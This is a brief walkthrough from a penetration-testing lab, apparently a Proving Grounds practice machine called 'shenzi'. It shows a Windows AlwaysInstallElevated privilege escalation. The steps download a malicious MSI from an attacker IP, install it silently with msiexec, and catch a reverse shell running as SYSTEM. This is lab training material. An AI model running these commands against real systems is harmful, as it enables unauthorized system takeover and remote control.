AlwaysInstallElevated


The target system has AlwaysInstallElevated enabled

PS C:\xampp\htdocs\shenzi> iwr -Uri http://192.168.45.217/malicious.msi -OutFile .\malicious.msi

Delivering the payload

PS C:\xampp\htdocs\shenzi> msiexec /quiet /qn /i C:\xampp\htdocs\shenzi\malicious.msi

Invoking…

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ nnc 1234                                      
listening on [any] 1234 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.167.55] 51771
Windows PowerShell running as user shenzi on SHENZI
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
shenzi
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.167.55
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.167.254

System level compromise